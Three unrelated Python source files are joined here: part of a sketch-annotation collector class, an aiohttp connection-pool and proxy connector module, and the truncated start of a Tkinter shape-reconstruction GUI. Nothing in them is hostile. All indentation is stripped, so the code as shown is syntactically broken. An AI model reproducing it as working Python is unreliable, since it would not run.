# collectionFromItem builds a new collection of size 1 from one of the base items (or returns None).
# mergeCollections takes two collections and merges them into one if possible.
# If this collector adds annotations other than the collection_annotype, list them in other_target_annos
def __init__(self, board, item_annotype_list, collection_annotype, other_target_annos = []):
BoardObserver.__init__(self, board)
self.getBoard().AddBoardObserver( self , [collection_annotype])
for annotype in item_annotype_list:
self.getBoard().RegisterForAnnotation( annotype, self )
self.getBoard().RegisterForAnnotation( collection_annotype, self )
self.all_collections = set([])
self.item_annotype_list = item_annotype_list # types of the "items" (e.g. CircleAnnotation, ArrowAnnotation)
self.collection_annotype = collection_annotype # type of the "collection" (e.g. DiGraphAnnotation)
def onAnnotationAdded( self, strokes, annotation ):
if type(annotation) is self.collection_annotype:
self.all_collections.add(annotation)
else:
for annotype in self.item_annotype_list:
if annotation.isType( annotype ):
collection = self.collectionFromItem( strokes, annotation )
if collection is not None:
self.all_collections.add( collection )
self.getBoard().AnnotateStrokes( strokes, collection )
self._merge_all_collections()
def onAnnotationRemoved( self, annotation ):
"""Unique to collections, removing an annotation that was used to build a collection
results in every dependent collection being removed and rebuilt from scratch.
** Ordering is NOT necessarily preserved! **"""
if( annotation in self.all_collections ):
self.all_collections.remove( annotation )
if type(annotation) in self.item_annotype_list:
logger.debug("Removing collection item: rebuilding collections")
all_item_annos = set([])
all_collection_annos = set([])
for s in annotation.Strokes:
all_collection_annos.update(set(s.findAnnotations(self.collection_annotype)) )
#For all of the collections that might depend on this annotation
# Get all of the item annotations that those collections might also depend on
for col in all_collection_annos:
for s in col.Strokes:
for t in self.item_annotype_list:
all_item_annos.update(set(s.findAnnotations(t)) )
#Remove any collections that may depend on this annotation
for anno in all_collection_annos:
self.getBoard().RemoveAnnotation(anno)
#Rebuild the annotations as needed from the remaining parts
for anno in all_item_annos:
if anno is not annotation:
self.onAnnotationAdded(anno.Strokes, anno)
def _merge_all_collections( self ):
"walk through all of the collections and merge any that should be"
check_set = set(self.all_collections) # make a copy of the set
while len(check_set)>0:
from_anno = check_set.pop()
# now iterate over the rest of the sets to find overlaps
for to_anno in check_set:
didmerge = self.mergeCollections( from_anno, to_anno )
if didmerge:
# calculate the new set of strokes for the collection
new_strokes = list( set(from_anno.Strokes).union( set(to_anno.Strokes) ) )
# now tell the board about what is happening
self.getBoard().UpdateAnnotation( to_anno, new_strokes )
self.getBoard().RemoveAnnotation( from_anno )
# we just removed the "from" anno so we don't need to try and merge
# it any more. Just pop out of this inner loop and get a new "from"
break
def mergeCollections( self, from_anno, to_anno ):
"Input: two collection anotations. Return false if they should not be merged, otherwise merge them"
# this should merge everything from "from_anno" into "to_anno". to_anno will be removed from the
# board if this function returns true.
logger.error("failure to implement virtual method 'mergeCollections'")
raise NotImplementedError
def collectionFromItem( self, strokes, annotation ):
"Input: strokes and source annotation. Return a new collection anno from this single base item annotation"
logger.error("failure to implement virtual method 'newCollectionAnno'")
raise NotImplementedError
#-------------------------------------
# if executed by itself, run all the doc tests
if __name__ == "__main__":
Logger.setDoctest(logger)
import doctest
doctest.testmod()
| |
import asyncio
import aiohttp
import functools
import http.cookies
import ssl
import sys
import traceback
import warnings
from collections import defaultdict
from hashlib import md5, sha1, sha256
from itertools import chain
from math import ceil
from types import MappingProxyType
from . import hdrs
from .client import ClientRequest
from .errors import ServerDisconnectedError
from .errors import HttpProxyError, ProxyConnectionError
from .errors import ClientOSError, ClientTimeoutError
from .errors import FingerprintMismatch
from .helpers import BasicAuth
from .resolver import DefaultResolver
__all__ = ('BaseConnector', 'TCPConnector', 'ProxyConnector', 'UnixConnector')
PY_343 = sys.version_info >= (3, 4, 3)
HASHFUNC_BY_DIGESTLEN = {
16: md5,
20: sha1,
32: sha256,
}
class Connection(object):
_source_traceback = None
_transport = None
def __init__(self, connector, key, request, transport, protocol, loop):
self._key = key
self._connector = connector
self._request = request
self._transport = transport
self._protocol = protocol
self._loop = loop
self.reader = protocol.reader
self.writer = protocol.writer
if loop.get_debug():
self._source_traceback = traceback.extract_stack(sys._getframe(1))
def __repr__(self):
return 'Connection<{}>'.format(self._key)
def __del__(self, _warnings=warnings):
if self._transport is not None:
_warnings.warn('Unclosed connection {!r}'.format(self),
ResourceWarning)
if hasattr(self._loop, 'is_closed'):
if self._loop.is_closed():
return
self._connector._release(
self._key, self._request, self._transport, self._protocol,
should_close=True)
context = {'client_connection': self,
'message': 'Unclosed connection'}
if self._source_traceback is not None:
context['source_traceback'] = self._source_traceback
self._loop.call_exception_handler(context)
@property
def loop(self):
return self._loop
def close(self):
if self._transport is not None:
self._connector._release(
self._key, self._request, self._transport, self._protocol,
should_close=True)
self._transport = None
def release(self):
if self._transport is not None:
self._connector._release(
self._key, self._request, self._transport, self._protocol,
should_close=False)
self._transport = None
def detach(self):
self._transport = None
@property
def closed(self):
return self._transport is None
class BaseConnector(object):
"""Base connector class.
:param conn_timeout: (optional) Connect timeout.
:param keepalive_timeout: (optional) Keep-alive timeout.
:param bool force_close: Set to True to force close and do reconnect
after each request (and between redirects).
:param loop: Optional event loop.
"""
_closed = True # prevent AttributeError in __del__ if ctor was failed
_source_traceback = None
def __init__(self, *, conn_timeout=None, keepalive_timeout=30,
share_cookies=False, force_close=False, limit=None,
loop=None):
if loop is None:
loop = asyncio.get_event_loop()
self._closed = False
if loop.get_debug():
self._source_traceback = traceback.extract_stack(sys._getframe(1))
self._conns = {}
self._acquired = defaultdict(set)
self._conn_timeout = conn_timeout
self._keepalive_timeout = keepalive_timeout
if share_cookies:
warnings.warn(
'Using `share_cookies` is deprecated. '
'Use Session object instead', DeprecationWarning)
self._share_cookies = share_cookies
self._cleanup_handle = None
self._force_close = force_close
self._limit = limit
self._waiters = defaultdict(list)
self._loop = loop
self._factory = functools.partial(
aiohttp.StreamProtocol, loop=loop,
disconnect_error=ServerDisconnectedError)
self.cookies = http.cookies.SimpleCookie()
def __del__(self, _warnings=warnings):
if self._closed:
return
if not self._conns:
return
conns = [repr(c) for c in self._conns.values()]
self.close()
_warnings.warn("Unclosed connector {!r}".format(self),
ResourceWarning)
context = {'connector': self,
'connections': conns,
'message': 'Unclosed connector'}
if self._source_traceback is not None:
context['source_traceback'] = self._source_traceback
self._loop.call_exception_handler(context)
@property
def force_close(self):
"""Ultimately close connection on releasing if True."""
return self._force_close
@property
def limit(self):
"""The limit for simultaneous connections to the same endpoint.
Endpoints are the same if they are have equal
(host, port, is_ssl) triple.
If limit is None the connector has no limit (default).
"""
return self._limit
def _cleanup(self):
"""Cleanup unused transports."""
if self._cleanup_handle:
self._cleanup_handle.cancel()
self._cleanup_handle = None
now = self._loop.time()
connections = {}
timeout = self._keepalive_timeout
for key, conns in self._conns.items():
alive = []
for transport, proto, t0 in conns:
if transport is not None:
if proto and not proto.is_connected():
transport = None
else:
delta = t0 + self._keepalive_timeout - now
if delta < 0:
transport.close()
transport = None
elif delta < timeout:
timeout = delta
if transport is not None:
alive.append((transport, proto, t0))
if alive:
connections[key] = alive
if connections:
self._cleanup_handle = self._loop.call_at(
ceil(now + timeout), self._cleanup)
self._conns = connections
def _start_cleanup_task(self):
if self._cleanup_handle is None:
now = self._loop.time()
self._cleanup_handle = self._loop.call_at(
ceil(now + self._keepalive_timeout), self._cleanup)
def close(self):
"""Close all opened transports."""
ret = asyncio.Future(loop=self._loop)
ret.set_result(None)
if self._closed:
return ret
self._closed = True
try:
if hasattr(self._loop, 'is_closed'):
if self._loop.is_closed():
return ret
for key, data in self._conns.items():
for transport, proto, t0 in data:
transport.close()
for transport in chain(*self._acquired.values()):
transport.close()
if self._cleanup_handle:
self._cleanup_handle.cancel()
finally:
self._conns.clear()
self._acquired.clear()
self._cleanup_handle = None
return ret
@property
def closed(self):
"""Is connector closed.
A readonly property.
"""
return self._closed
def update_cookies(self, cookies):
"""Update shared cookies.
Deprecated, use ClientSession instead.
"""
if isinstance(cookies, dict):
cookies = cookies.items()
for name, value in cookies:
if PY_343:
self.cookies[name] = value
else:
if isinstance(value, http.cookies.Morsel):
# use dict method because SimpleCookie class modifies value
dict.__setitem__(self.cookies, name, value)
else:
self.cookies[name] = value
@asyncio.coroutine
def connect(self, req):
"""Get from pool or create new connection."""
key = (req.host, req.port, req.ssl)
limit = self._limit
if limit is not None:
fut = asyncio.Future(loop=self._loop)
waiters = self._waiters[key]
# The limit defines the maximum number of concurrent connections
# for a key. Waiters must be counted against the limit, even before
# the underlying connection is created.
available = limit - len(waiters) - len(self._acquired[key])
# Don't wait if there are connections available.
if available > 0:
fut.set_result(None)
# This connection will now count towards the limit.
waiters.append(fut)
yield from fut
transport, proto = self._get(key)
if transport is None:
try:
if self._conn_timeout:
transport, proto = yield from asyncio.wait_for(
self._create_connection(req),
self._conn_timeout, loop=self._loop)
else:
transport, proto = yield from self._create_connection(req)
except asyncio.TimeoutError as exc:
raise ClientTimeoutError(
'Connection timeout to host {0[0]}:{0[1]} ssl:{0[2]}'
.format(key)) from exc
except OSError as exc:
raise ClientOSError(
exc.errno,
'Cannot connect to host {0[0]}:{0[1]} ssl:{0[2]} [{1}]'
.format(key, exc.strerror)) from exc
self._acquired[key].add(transport)
conn = Connection(self, key, req, transport, proto, self._loop)
return conn
def _get(self, key):
try:
conns = self._conns[key]
except KeyError:
return None, None
t1 = self._loop.time()
while conns:
transport, proto, t0 = conns.pop()
if transport is not None and proto.is_connected():
if t1 - t0 > self._keepalive_timeout:
transport.close()
transport = None
else:
if not conns:
# The very last connection was reclaimed: drop the key
del self._conns[key]
return transport, proto
# No more connections: drop the key
del self._conns[key]
return None, None
def _release(self, key, req, transport, protocol, *, should_close=False):
if self._closed:
# acquired connection is already released on connector closing
return
acquired = self._acquired[key]
try:
acquired.remove(transport)
except KeyError: # pragma: no cover
# this may be result of undetermenistic order of objects
# finalization due garbage collection.
pass
else:
if self._limit is not None and len(acquired) < self._limit:
waiters = self._waiters[key]
while waiters:
waiter = waiters.pop(0)
if not waiter.done():
waiter.set_result(None)
break
resp = req.response
if not should_close:
if self._force_close:
should_close = True
elif resp is not None:
should_close = resp._should_close
reader = protocol.reader
if should_close or (reader.output and not reader.output.at_eof()):
transport.close()
else:
conns = self._conns.get(key)
if conns is None:
conns = self._conns[key] = []
conns.append((transport, protocol, self._loop.time()))
reader.unset_parser()
self._start_cleanup_task()
@asyncio.coroutine
def _create_connection(self, req):
raise NotImplementedError()
_SSL_OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
_marker = object()
class TCPConnector(BaseConnector):
"""TCP connector.
:param bool verify_ssl: Set to True to check ssl certifications.
:param bytes fingerprint: Pass the binary md5, sha1, or sha256
digest of the expected certificate in DER format to verify
that the certificate the server presents matches. See also
https://en.wikipedia.org/wiki/Transport_Layer_Security#Certificate_pinning
:param bool resolve: (Deprecated) Set to True to do DNS lookup for
host name.
:param AbstractResolver resolver: Enable DNS lookups and use this
resolver
:param bool use_dns_cache: Use memory cache for DNS lookups.
:param family: socket address family
:param local_addr: local :class:`tuple` of (host, port) to bind socket to
:param args: see :class:`BaseConnector`
:param kwargs: see :class:`BaseConnector`
"""
def __init__(self, *, verify_ssl=True, fingerprint=None,
resolve=_marker, use_dns_cache=_marker,
family=0, ssl_context=None, local_addr=None, resolver=None,
**kwargs):
super().__init__(**kwargs)
if not verify_ssl and ssl_context is not None:
raise ValueError(
"Either disable ssl certificate validation by "
"verify_ssl=False or specify ssl_context, not both.")
self._verify_ssl = verify_ssl
if fingerprint:
digestlen = len(fingerprint)
hashfunc = HASHFUNC_BY_DIGESTLEN.get(digestlen)
if not hashfunc:
raise ValueError('fingerprint has invalid length')
self._hashfunc = hashfunc
self._fingerprint = fingerprint
if resolve is not _marker:
warnings.warn(("resolve parameter is deprecated, "
"use use_dns_cache instead"),
DeprecationWarning, stacklevel=2)
if use_dns_cache is not _marker and resolve is not _marker:
if use_dns_cache != resolve:
raise ValueError("use_dns_cache must agree with resolve")
_use_dns_cache = use_dns_cache
elif use_dns_cache is not _marker:
_use_dns_cache = use_dns_cache
elif resolve is not _marker:
_use_dns_cache = resolve
else:
_use_dns_cache = False
self._resolver = resolver or DefaultResolver(loop=self._loop)
if _use_dns_cache or resolver:
self._use_resolver = True
else:
self._use_resolver = False
self._use_dns_cache = _use_dns_cache
self._cached_hosts = {}
self._ssl_context = ssl_context
self._family = family
self._local_addr = local_addr
@property
def verify_ssl(self):
"""Do check for ssl certifications?"""
return self._verify_ssl
@property
def fingerprint(self):
"""Expected ssl certificate fingerprint."""
return self._fingerprint
@property
def ssl_context(self):
"""SSLContext instance for https requests.
Lazy property, creates context on demand.
"""
if self._ssl_context is None:
if not self._verify_ssl:
sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.options |= ssl.OP_NO_SSLv3
sslcontext.options |= _SSL_OP_NO_COMPRESSION
sslcontext.set_default_verify_paths()
else:
sslcontext = ssl.create_default_context()
self._ssl_context = sslcontext
return self._ssl_context
@property
def family(self):
"""Socket family like AF_INET."""
return self._family
@property
def use_dns_cache(self):
"""True if local DNS caching is enabled."""
return self._use_dns_cache
@property
def cached_hosts(self):
"""Read-only dict of cached DNS record."""
return MappingProxyType(self._cached_hosts)
def clear_dns_cache(self, host=None, port=None):
"""Remove specified host/port or clear all dns local cache."""
if host is not None and port is not None:
self._cached_hosts.pop((host, port), None)
elif host is not None or port is not None:
raise ValueError("either both host and port "
"or none of them are allowed")
else:
self._cached_hosts.clear()
@property
def resolve(self):
"""Do DNS lookup for host name?"""
warnings.warn((".resolve property is deprecated, "
"use .dns_cache instead"),
DeprecationWarning, stacklevel=2)
return self.use_dns_cache
@property
def resolved_hosts(self):
"""The dict of (host, port) -> (ipaddr, port) pairs."""
warnings.warn((".resolved_hosts property is deprecated, "
"use .cached_hosts instead"),
DeprecationWarning, stacklevel=2)
return self.cached_hosts
def clear_resolved_hosts(self, host=None, port=None):
"""Remove specified host/port or clear all resolve cache."""
warnings.warn((".clear_resolved_hosts() is deprecated, "
"use .clear_dns_cache() instead"),
DeprecationWarning, stacklevel=2)
if host is not None and port is not None:
self.clear_dns_cache(host, port)
else:
self.clear_dns_cache()
@asyncio.coroutine
def _resolve_host(self, host, port):
if not self._use_resolver:
return [{'hostname': host, 'host': host, 'port': port,
'family': self._family, 'proto': 0, 'flags': 0}]
assert self._resolver
if self._use_dns_cache:
key = (host, port)
if key not in self._cached_hosts:
self._cached_hosts[key] = yield from \
self._resolver.resolve(host, port, family=self._family)
return self._cached_hosts[key]
else:
res = yield from self._resolver.resolve(
host, port, family=self._family)
return res
@asyncio.coroutine
def _create_connection(self, req):
"""Create connection.
Has same keyword arguments as BaseEventLoop.create_connection.
"""
if req.ssl:
sslcontext = self.ssl_context
else:
sslcontext = None
hosts = yield from self._resolve_host(req.host, req.port)
exc = None
for hinfo in hosts:
try:
host = hinfo['host']
port = hinfo['port']
transp, proto = yield from self._loop.create_connection(
self._factory, host, port,
ssl=sslcontext, family=hinfo['family'],
proto=hinfo['proto'], flags=hinfo['flags'],
server_hostname=hinfo['hostname'] if sslcontext else None,
local_addr=self._local_addr)
has_cert = transp.get_extra_info('sslcontext')
if has_cert and self._fingerprint:
sock = transp.get_extra_info('socket')
if not hasattr(sock, 'getpeercert'):
# Workaround for asyncio 3.5.0
# Starting from 3.5.1 version
# there is 'ssl_object' extra info in transport
sock = transp._ssl_protocol._sslpipe.ssl_object
# gives DER-encoded cert as a sequence of bytes (or None)
cert = sock.getpeercert(binary_form=True)
assert cert
got = self._hashfunc(cert).digest()
expected = self._fingerprint
if got != expected:
transp.close()
raise FingerprintMismatch(expected, got, host, port)
return transp, proto
except OSError as e:
exc = e
else:
raise ClientOSError(exc.errno,
'Can not connect to %s:%s [%s]' %
(req.host, req.port, exc.strerror)) from exc
class ProxyConnector(TCPConnector):
"""Http Proxy connector.
:param str proxy: Proxy URL address. Only HTTP proxy supported.
:param proxy_auth: (optional) Proxy HTTP Basic Auth
:type proxy_auth: aiohttp.helpers.BasicAuth
:param args: see :class:`TCPConnector`
:param kwargs: see :class:`TCPConnector`
Usage:
>>> conn = ProxyConnector(proxy="http://some.proxy.com")
>>> session = ClientSession(connector=conn)
>>> resp = yield from session.get('http://python.org')
"""
def __init__(self, proxy, *, proxy_auth=None, force_close=True,
**kwargs):
super().__init__(force_close=force_close, **kwargs)
self._proxy = proxy
self._proxy_auth = proxy_auth
assert proxy.startswith('http://'), (
"Only http proxy supported", proxy)
assert proxy_auth is None or isinstance(proxy_auth, BasicAuth), (
"proxy_auth must be None or BasicAuth() tuple", proxy_auth)
@property
def proxy(self):
"""Proxy URL."""
return self._proxy
@property
def proxy_auth(self):
"""Proxy auth info.
Should be BasicAuth instance.
"""
return self._proxy_auth
@asyncio.coroutine
def _create_connection(self, req):
proxy_req = ClientRequest(
hdrs.METH_GET, self._proxy,
headers={hdrs.HOST: req.host},
auth=self._proxy_auth,
loop=self._loop)
try:
transport, proto = yield from super()._create_connection(proxy_req)
except OSError as exc:
raise ProxyConnectionError(*exc.args) from exc
if not req.ssl:
req.path = '{scheme}://{host}{path}'.format(scheme=req.scheme,
host=req.netloc,
path=req.path)
if hdrs.AUTHORIZATION in proxy_req.headers:
auth = proxy_req.headers[hdrs.AUTHORIZATION]
del proxy_req.headers[hdrs.AUTHORIZATION]
if not req.ssl:
req.headers[hdrs.PROXY_AUTHORIZATION] = auth
else:
proxy_req.headers[hdrs.PROXY_AUTHORIZATION] = auth
if req.ssl:
# For HTTPS requests over HTTP proxy
# we must notify proxy to tunnel connection
# so we send CONNECT command:
# CONNECT www.python.org:443 HTTP/1.1
# Host: www.python.org
#
# next we must do TLS handshake and so on
# to do this we must wrap raw socket into secure one
# asyncio handles this perfectly
proxy_req.method = hdrs.METH_CONNECT
proxy_req.path = '{}:{}'.format(req.host, req.port)
key = (req.host, req.port, req.ssl)
conn = Connection(self, key, proxy_req,
transport, proto, self._loop)
self._acquired[key].add(conn._transport)
proxy_resp = proxy_req.send(conn.writer, conn.reader)
try:
resp = yield from proxy_resp.start(conn, True)
except:
proxy_resp.close()
conn.close()
raise
else:
conn.detach()
if resp.status != 200:
raise HttpProxyError(code=resp.status, message=resp.reason)
rawsock = transport.get_extra_info('socket', default=None)
if rawsock is None:
raise RuntimeError(
"Transport does not expose socket instance")
transport.pause_reading()
transport, proto = yield from self._loop.create_connection(
self._factory, ssl=self.ssl_context, sock=rawsock,
server_hostname=req.host)
finally:
proxy_resp.close()
return transport, proto
class UnixConnector(BaseConnector):
"""Unix socket connector.
:param str path: Unix socket path.
:param args: see :class:`BaseConnector`
:param kwargs: see :class:`BaseConnector`
Usage:
>>> conn = UnixConnector(path='/path/to/socket')
>>> session = ClientSession(connector=conn)
>>> resp = yield from session.get('http://python.org')
"""
def __init__(self, path, **kwargs):
super().__init__(**kwargs)
self._path = path
@property
def path(self):
"""Path to unix socket."""
return self._path
@asyncio.coroutine
def _create_connection(self, req):
return (yield from self._loop.create_unix_connection(
self._factory, self._path))
| |
import shape as sp
from Tkinter import *
import fileManager as fm
#from PIL import Image, ImageTk
from ModelBuilder import ModelBuilder
from texture import Texture
from texture import Point
import cv2
import camera
class App:
def __init__(self, master):
self.master = master
self.master.title("cv_recontruction")
self.imgFile = "project.gif"
# init parameters
self.shapes = []
self.state = 1
self.currentIndex = -1
self.newShapeFlag = True
self.updateRightFrame2Flag = True
# create object for test purpose
#create object for test purpose
FM = fm.FileManager()
self.shapes = FM.importShapes("Standard_Input.txt")
self.initUI()
self.clear()
def initUI(self):
self.initTopFrames()
self.initLeftFrame()
self.initRightFrames()
self.drawShapes()
# show topframe 1 and right frame
self.show(self.state)
def drawShapes(self):
for s in self.shapes:
if isinstance(s, sp.Tree):
print "tree"
else:
for f in s.faces:
for i in range(len(f.facePoints) -1 ):
lineId = self.canvas.create_line(f.facePoints[i][0], f.facePoints[i][1],
f.facePoints[i+1][0], f.facePoints[i+1][1], fill="red")
f.lineIds.append(lineId)
lineId = self.canvas.create_line(f.facePoints[0][0], f.facePoints[0][1],
f.facePoints[len(f.facePoints)-1][0], f.facePoints[len(f.facePoints)-1][1], fill="red")
f.lineIds.append(lineId)
def clear(self):
self.pointId = ""
self.points = []
self.lineIds = []
def testPrint(self):
print ""
print ""
for x in xrange(len(self.shapes)):
print self.shapes[x].name
if isinstance(self.shapes[x], sp.Cylinder):
print "center = ", self.shapes[x].center
print "radius = ", self.shapes[x].radius
print "height = ", self.shapes[x].height
elif isinstance(self.shapes[x], sp.Cuboid) or isinstance(self.shapes[self.currentIndex], sp.Prism):
print "center = ", self.shapes[x].center
print "length = ", self.shapes[x].length
print "width = ", self.shapes[x].width
print "height = ", self.shapes[x].height
elif isinstance(self.shapes[x], sp.Frustum):
print "center = ", self.shapes[x].center
print "upperLength = ", self.shapes[x].upperLength
print "lowerLength = ", self.shapes[x].lowerLength
print "upperWidth = ", self.shapes[x].upperWidth
print "lowerWidth = ", self.shapes[x].lowerWidth
print "height = ", self.shapes[x].height
elif isinstance(self.shapes[x], sp.Tree):
print "center = ", self.shapes[x].center
print "height = ", self.shapes[x].height
print ""
def fecthRightFrame2Data(self):
if isinstance(self.shapes[self.currentIndex], sp.Cylinder):
for i in range(6):
self.pEntries[i].delete(0, END)
self.pEntries[1].insert(0, self.shapes[self.currentIndex].center[0])
self.pEntries[2].insert(0, self.shapes[self.currentIndex].center[1])
self.pEntries[3].insert(0, self.shapes[self.currentIndex].center[2])
self.pEntries[4].insert(0, self.shapes[self.currentIndex].radius)
self.pEntries[5].insert(0, self.shapes[self.currentIndex].height)
elif isinstance(self.shapes[self.currentIndex], sp.Cuboid) or isinstance(self.shapes[self.currentIndex],
sp.Prism):
for i in range(7):
self.pEntries[i].delete(0, END)
self.pEntries[1].insert(0, self.shapes[self.currentIndex].center[0])
self.pEntries[2].insert(0, self.shapes[self.currentIndex].center[1])
self.pEntries[3].insert(0, self.shapes[self.currentIndex].center[2])
self.pEntries[4].insert(0, self.shapes[self.currentIndex].length)
self.pEntries[5].insert(0, self.shapes[self.currentIndex].width)
self.pEntries[6].insert(0, self.shapes[self.currentIndex].height)
elif isinstance(self.shapes[self.currentIndex], sp.Frustum):
for i in range(9):
self.pEntries[i].delete(0, END)
self.pEntries[1].insert(0, self.shapes[self.currentIndex].center[0])
self.pEntries[2].insert(0, self.shapes[self.currentIndex].center[1])
self.pEntries[3].insert(0, self.shapes[self.currentIndex].center[2])
self.pEntries[4].insert(0, self.shapes[self.currentIndex].upperLength)
self.pEntries[5].insert(0, self.shapes[self.currentIndex].upperWidth)
self.pEntries[6].insert(0, self.shapes[self.currentIndex].lowerLength)
self.pEntries[7].insert(0, self.shapes[self.currentIndex].lowerWidth)
self.pEntries[8].insert(0, self.shapes[self.currentIndex].height)
elif isinstance(self.shapes[self.currentIndex], sp.Tree):
for i in range(5):
self.pEntries[i].delete(0, END)
self.pEntries[1].insert(0, self.shapes[self.currentIndex].center[0])
self.pEntries[2].insert(0, self.shapes[self.currentIndex].center[1])
self.pEntries[3].insert(0, self.shapes[self.currentIndex].center[2])
self.pEntries[4].insert(0, self.shapes[self.currentIndex].height)
#no entries for ground and sky
self.pEntries[0].insert(0, self.shapes[self.currentIndex].name)
def updateFacesList(self):
self.facesList.delete(0, END)
for item in self.shapes[self.currentIndex].faces:
self.facesList.insert(END, item.faceOrientation) # orientation
# pragma mark -- init frames
def initTopFrames(self):
# top frame 1
self.topFrame1 = Frame(self.master, width=900 + 20, height=30, bd=1, relief=SUNKEN)
self.shape = StringVar(self.master)
self.shape.set("cylinder") # default value
self.shapeOptionMenu = OptionMenu(self.topFrame1, self.shape, "cylinder", "cuboid", "prism", "frustum", "tree",
"ground", "sky")
self.newShapeButton = Button(self.topFrame1, text="create new shape", command=self.newShapeButton)
self.generateVideoButton = Button(self.topFrame1, text="generate models", command=self.generateVideoButton)
#top frame 2
self.topFrame2 = Frame(self.master, width=900 + 20, height=30, bd=1, relief=SUNKEN)
self.cancelButton2 = Button(self.topFrame2, text="cancel", command=self.cancelButton2)
self.doneButton2 = Button(self.topFrame2, text="done", command=self.doneButton2)
#top frame 3
self.topFrame3 = Frame(self.master, width=900 + 20, height=30, bd=1, relief=SUNKEN)
self.cancelButton3 = Button(self.topFrame3, text="cancel", command=self.cancelButton3)
self.doneButton3 = Button(self.topFrame3, text="done", command=self.doneButton3)
def initLeftFrame(self):
# load image use PIL library
#self.img = Image.open(self.imgFile)
#angle = 180
tkImage = PhotoImage(file = self.imgFile)
#window frame configuration
self.leftFrame = Frame(self.master)
self.leftFrame.grid(row=1, column=0)
#self.leftFrame.grid_rowconfigure(0, weight=1) #strenth to row
#self.leftFrame.grid_columnconfigure(0, weight=1)
#define scroll bar
xscrollbar = Scrollbar(self.leftFrame, orient=HORIZONTAL)
xscrollbar.grid(row=1, column=0, sticky=E + W)
yscrollbar = Scrollbar(self.leftFrame)
yscrollbar.grid(row=0, column=1, sticky=N + S)
#create canvas to load the image
self.canvas = Canvas(self.leftFrame, width=900 + 20, height=600 + 20, xscrollcommand=xscrollbar.set,
yscrollcommand=yscrollbar.set)
self.canvas.create_image(10, 10, anchor=NW, image=tkImage)
self.canvas.image = tkImage #hold a reference
self.canvas.bind("<Button-1>", self.canvasClicked)
#canvas.pack(fill = BOTH, expand = 1)
self.canvas.grid(row=0, column=0, sticky=N + S + E + W)
#config scroll bar
self.canvas.config(scrollregion=self.canvas.bbox(ALL))
xscrollbar.config(command=self.canvas.xview)
yscrollbar.config(command=self.canvas.yview)
def initRightFrames(self):
self.rightFrame1 = Frame(self.master, width=250, height=600 + 20 + 30, bd=1, relief=SUNKEN)
self.listLabel = Label(self.rightFrame1, text="All Shapes")
self.shapesList = Listbox(self.rightFrame1, height=30)
for item in self.shapes:
self.shapesList.insert(END, item.name)
self.editButton = Button(self.rightFrame1, text="edit", command=self.editButton1)
self.deleteButton = Button(self.rightFrame1, text="delete", command=self.deleteButton)
# init right frame 2
self.rightFrame2 = Frame(self.master, width=250, height=600 + 20 + 30, bd=1, relief=SUNKEN)
self.pLabels = [0, 0, 0, 0, 0, 0, 0]
self.pEntries = [0, 0, 0, 0, 0, 0, 0, 0, 0]
for i in xrange(7):
self.pLabels[i] = Label(self.rightFrame2)
self.pEntries[i] = Entry(self.rightFrame2)
for i in range(6, 9):
self.pEntries[i] = Entry(self.rightFrame2)
self.pEntries[1].config(width=7)
self.pEntries[2].config(width=7)
self.pEntries[3].config(width=7)
self.faceListLabel = Label(self.rightFrame2, text="All Faces")
self.facesList = Listbox(self.rightFrame2, height=15)
self.addFaceButton = Button(self.rightFrame2, text="add new face", command=self.addFaceButton)
self.deleteFaceButton = Button(self.rightFrame2, text="delete", command=self.deleteFaceButton)
#init right frame 3
self.rightFrame3 = Frame(self.master, width=250, height=600 + 20 + 30, bd=1, relief=SUNKEN)
self.faceDirLabel = Label(self.rightFrame3, text="Orientation: ")
self.faceDir = StringVar(self.master)
self.faceDir.set("Left") # default value
self.faceOptionMenu = OptionMenu(self.rightFrame3, self.faceDir, "Left", "Right", "Upper", "Front","Surface")
# pragma mark -- show frames
def show(self, state):
if state == 1:
self.showTopFrame(1)
self.showRightFrame(1)
#self.testPrint()
elif state == 2:
self.showTopFrame(2)
self.showRightFrame(2)
elif state == 3:
self.showTopFrame(3)
self.showRightFrame(3)
def showTopFrame(self, frame):
if frame == 1:
self.showTopFrame1(1)
self.showTopFrame2(0)
self.showTopFrame3(0)
elif frame == 2:
self.showTopFrame1(0)
self.showTopFrame2(1)
self.showTopFrame3(0)
elif frame == 3:
self.showTopFrame1(0)
self.showTopFrame2(0)
self.showTopFrame3(1)
def showTopFrame1(self, flag):
if flag == 1:
self.topFrame1.grid(row=0, column=0, sticky=N + S + W + E)
self.shapeOptionMenu.pack(side=LEFT)
self.newShapeButton.pack(side=LEFT)
self.generateVideoButton.pack(side=RIGHT)
else:
self.topFrame1.grid_forget()
self.shapeOptionMenu.pack_forget()
self.newShapeButton.pack_forget()
self.generateVideoButton.pack_forget()
def showTopFrame2(self, flag):
if flag == 1:
self.topFrame2.grid(row=0, column=0, sticky=N + S + W + E)
self.cancelButton2.pack(side=LEFT)
self.doneButton2.pack(side=RIGHT)
else:
self.topFrame2.grid_forget()
self.cancelButton3.pack_forget()
self.doneButton3.pack_forget()
def showTopFrame3(self, flag):
if flag == 1:
self.topFrame3.grid(row=0, column=0, sticky=N + S + W + E)
self.cancelButton3.pack(side=LEFT)
self.doneButton3.pack(side=RIGHT)
else:
self.topFrame3.grid_forget()
self.cancelButton3.pack_forget()
self.doneButton3.pack_forget()
def showRightFrame(self, frame):
if frame == 1:
self.showRightFrame1(1)
self.showRightFrame2(0)
self.showRightFrame3(0)
elif frame == 2:
self.showRightFrame1(0)
self.showRightFrame2(1)
self.showRightFrame3(0)
else:
self.showRightFrame1(0)
self.showRightFrame2(0)
self.showRightFrame3(1)
def showRightFrame1(self, flag):
if flag == 1:
self.rightFrame1.grid(column=1, row=0, rowspan=2, sticky=N + W + E + S)
self.rightFrame1.pack_propagate(0)
self.listLabel.pack(fill=X)
self.shapesList.pack(fill=BOTH)
self.editButton.pack(fill=X)
self.deleteButton.pack(fill=X)
else:
self.rightFrame1.grid_forget()
self.listLabel.pack_forget()
self.shapesList.pack_forget()
self.editButton.pack_forget()
self.deleteButton.pack_forget()
def showRightFrame2(self, flag):
if flag == 1:
self.updateFacesList()
maxRow = 3
self.rightFrame2.grid(column=1, row=0, rowspan=2, sticky=N + W + E + S)
self.rightFrame2.grid_propagate(0)
self.pLabels[0].config(text="name")
self.pLabels[0].grid(row=0, column=0)
self.pEntries[0].grid(row=0, column=1, columnspan=2)
if isinstance(self.shapes[self.currentIndex], sp.Cylinder):
self.pLabels[1].config(text="center")
self.pLabels[2].config(text="radius")
